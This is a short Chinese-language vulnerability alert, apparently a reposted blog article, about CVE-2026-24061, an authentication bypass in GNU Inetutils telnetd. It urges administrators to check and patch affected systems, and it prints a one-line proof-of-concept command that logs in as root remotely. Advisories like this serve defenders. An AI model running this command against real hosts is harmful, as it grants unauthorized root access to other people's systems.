文章总结： GNUInetutilstelnetd存在远程认证绕过漏洞CVE-2026-24061，攻击者通过特定参数即可在受影响设备上获取Root权限。利用难度极低，仅需目标开启telnetd服务。鉴于部分特殊设备可能启用telnet，建议管理员立即排查并修复相关环境。 综合评分： 65 文章分类： 漏洞预警,漏洞POC

大洞，速修！！！Linux Telnetd 远程代码执行！

原创

ChinaRan404 ChinaRan404

知攻善防实验室

2026年1月22日 11:10 浙江

字少，事大，漏洞介绍：

【已复现】多款 Linux telnetd服务中招，仅需一个参数即可远程获取 Root 权限，GNU Inetutils telnetd 远程认证绕过漏洞(CVE-2026-24061)

最新版本已

复现

USER='-f root' telnet -a ip

利用难度：极为简单

利用条件：在漏洞版本，开启 telnetd服务

复现版本：

https://ftp.gnu.org/gnu/inetutils/inetutils-2.7.tar.gz

情报来源：ByAtomsTeam狩猎POC 来源：https://www.openwall.com/lists/oss-security/2026/01/20/2

我想说：正常人 Linux 管理都是用 SSH，但是有些设备可能就不是了，火速排查！

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：知攻善防实验室 ChinaRan404 ChinaRan404《大洞，速修！！！Linux Telnetd 远程代码执行！》